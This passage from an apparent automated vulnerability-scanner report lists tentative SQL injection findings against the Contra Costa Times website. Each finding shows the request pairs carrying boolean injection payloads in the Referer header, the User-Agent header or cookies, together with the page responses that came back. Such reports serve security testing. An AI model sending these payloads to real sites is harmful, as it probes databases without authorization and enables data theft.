<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatime
...[SNIP]...

1.138. http://www.contracostatimes.com/ci_16791142 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16791142

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:39:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:39:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:39:29 GMT
Set-Cookie: JSESSIONID=ALISDGBW05WY4CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNG
...[SNIP]...

Request 2

GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:39:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:39:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0IVUTJH1NV4OYCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MN
...[SNIP]...

1.139. http://www.contracostatimes.com/ci_16792343 [currBrandCheck cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16792343

Issue detail

The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the currBrandCheck cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d1--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:47:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:47:01 GMT
Set-Cookie: JSESSIONID=HOVL5CAX1C3Z2CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><scri
...[SNIP]...

Request 2

GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d2--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:47:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:47:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=TGAIYGZP4PP1ACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https:/
...[SNIP]...

1.140. http://www.contracostatimes.com/ci_16792616 [u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16792616

Issue detail

The u cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the u cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16792616?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d1--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:49:50 GMT
Set-Cookie: JSESSIONID=3LYV5JNFYXOO2CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where he&#27;ll introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "
...[SNIP]...

Request 2

GET /ci_16792616?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d2--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=MZTZRRTLPS3HSCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where he&#27;ll introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/
...[SNIP]...

1.141. http://www.contracostatimes.com/news/ci_16783847 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16783847

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10497043'%20or%201%3d1--%20 and 10497043'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d1--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:23 GMT
Set-Cookie: JSESSIONID=OG3AP1HCGKI5UCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get pr
...[SNIP]...

Request 2

GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d2--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=CRHSLFYTFE1MUCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistration
...[SNIP]...

1.142. http://www.contracostatimes.com/news/ci_16791147 [EMETA_COOKIE_CHECK_MNGI cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16791147

Issue detail

The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads 17543039%20or%201%3d1--%20 and 17543039%20or%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
